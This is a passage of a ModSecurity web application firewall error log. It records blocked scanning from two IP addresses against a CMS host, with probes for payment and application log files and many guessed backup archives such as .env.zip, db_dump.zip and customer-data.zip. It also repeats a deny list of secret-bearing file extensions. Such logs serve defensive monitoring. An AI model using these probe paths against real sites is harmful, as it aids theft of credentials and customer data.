file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "aa0Phn-dmvIeGeY060neEQAAAdM"] [Sun Mar 08 07:56:22.559523 2026] [:error] [pid 12819:tid 12867] [client 185.177.72.60:10688] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "aa0PhvNtUJnAKTO-2_-WPgAAAlY"] [Sun Mar 08 07:56:22.827563 2026] [:error] [pid 12699:tid 12729] [client 185.177.72.60:6562] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aa0PhhvluGPp5v4Lok_KVgAAAg8"] [Sun Mar 08 07:56:22.856430 2026] [:error] [pid 13471:tid 13492] [client 185.177.72.60:10602] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aa0Phr8gLDtA4xTIJqDyjgAAABE"] [Sun Mar 08 07:56:22.960714 2026] [:error] [pid 27307:tid 27320] [client 185.177.72.60:10626] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aa0Phgo1nI2o7tYBWw9GGAAAAUs"] [Sun Mar 08 07:56:22.989696 2026] [:error] [pid 13471:tid 13490] [client 185.177.72.60:10608] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "aa0Phr8gLDtA4xTIJqDykAAAAA8"] [Sun Mar 08 07:56:22.992825 2026] [:error] [pid 12819:tid 12844] [client 185.177.72.60:10862] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "aa0PhvNtUJnAKTO-2_-WPwAAAkA"] [Sun Mar 08 19:04:39.600259 2026] [:error] [pid 12902:tid 12939] [client 35.189.151.148:32844] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAkgAAAoQ"] [Sun Mar 08 19:04:39.645864 2026] [:error] [pid 13472:tid 13503] [client 35.189.151.148:60120] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/old.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8sQAAAEE"] [Sun Mar 08 19:04:39.646961 2026] [:error] [pid 13471:tid 13497] [client 35.189.151.148:59954] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/com.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3wwAAABY"] [Sun Mar 08 19:04:39.651118 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:60312] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/website.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3xAAAAA8"] [Sun Mar 08 19:04:39.652778 2026] [:error] [pid 13471:tid 13488] [client 35.189.151.148:60594] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/old-version.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3xQAAAA0"] [Sun Mar 08 19:04:39.653479 2026] [:error] [pid 13471:tid 13489] [client 35.189.151.148:60114] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/errors.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3xgAAAA4"] [Sun Mar 08 19:04:39.656292 2026] [:error] [pid 13471:tid 13479] [client 35.189.151.148:32894] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.temp.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3xwAAAAQ"] [Sun Mar 08 19:04:39.661008 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:60564] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/result.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3yAAAAAk"] [Sun Mar 08 19:04:39.661638 2026] [:error] [pid 13471:tid 13498] [client 35.189.151.148:60116] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/store-backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3yQAAABc"] [Sun Mar 08 19:04:39.665359 2026] [:error] [pid 13471:tid 13493] [client 35.189.151.148:60280] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sql_full.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3ygAAABI"] [Sun Mar 08 19:04:39.668700 2026] [:error] [pid 13471:tid 13477] [client 35.189.151.148:60050] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-3.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3ywAAAAI"] [Sun Mar 08 19:04:39.668738 2026] [:error] [pid 13605:tid 13627] [client 35.189.151.148:59836] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/libraries.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfjgAAANQ"] [Sun Mar 08 19:04:39.670890 2026] [:error] [pid 13471:tid 13487] [client 35.189.151.148:32924] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/notifications.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3zAAAAAw"] [Sun Mar 08 19:04:39.673383 2026] [:error] [pid 13471:tid 13496] [client 35.189.151.148:32796] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_stack.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3zQAAABU"] [Sun Mar 08 19:04:39.675251 2026] [:error] [pid 13605:tid 13614] [client 35.189.151.148:60244] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/dbadmin.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfjwAAAMc"] [Sun Mar 08 19:04:39.675261 2026] [:error] [pid 12902:tid 12938] [client 35.189.151.148:32790] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sql-export.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAkwAAAoM"] [Sun Mar 08 19:04:39.679244 2026] [:error] [pid 13471:tid 13480] [client 35.189.151.148:32944] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-2024.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3zgAAAAU"] [Sun Mar 08 19:04:39.680640 2026] [:error] [pid 13472:tid 13523] [client 35.189.151.148:60954] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/beta.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8sgAAAE8"] [Sun Mar 08 19:04:39.684494 2026] [:error] [pid 13472:tid 13504] [client 35.189.151.148:60914] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/rest.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8swAAAEI"] [Sun Mar 08 19:04:39.685203 2026] [:error] [pid 13605:tid 13619] [client 35.189.151.148:60072] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/database-backup.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfkAAAAMw"] [Sun Mar 08 19:04:39.688861 2026] [:error] [pid 13471:tid 13485] [client 35.189.151.148:60858] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/customer-data.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3zwAAAAo"] [Sun Mar 08 19:04:39.691211 2026] [:error] [pid 13472:tid 13532] [client 35.189.151.148:60504] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-logs.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8tAAAAFM"] [Sun Mar 08 19:04:39.693894 2026] [:error] [pid 13471:tid 13491] [client 35.189.151.148:60634] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD30AAAABA"] [Sun Mar 08 19:04:39.699870 2026] [:error] [pid 13472:tid 13506] [client 35.189.151.148:60102] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/hotfix.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8tQAAAEQ"] [Sun Mar 08 19:04:39.700430 2026] [:error] [pid 13471:tid 13494] [client 35.189.151.148:60910] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_9.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD30QAAABM"] [Sun Mar 08 19:04:39.703280 2026] [:error] [pid 13472:tid 13517] [client 35.189.151.148:60436] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/services.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8tgAAAEw"] [Sun Mar 08 19:04:39.708309 2026] [:error] [pid 13471:tid 13481] [client 35.189.151.148:60848] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/db_dump.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD30gAAAAY"] [Sun Mar 08 19:04:39.711418 2026] [:error] [pid 13471:tid 13476] [client 35.189.151.148:60002] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_8.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD30wAAAAE"] [Sun Mar 08 19:04:39.711672 2026] [:error] [pid 12902:tid 12952] [client 35.189.151.148:60860] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/cpanel.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAlAAAApE"] [Sun Mar 08 19:04:39.712580 2026] [:error] [pid 13471:tid 13499] [client 35.189.151.148:60008] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity 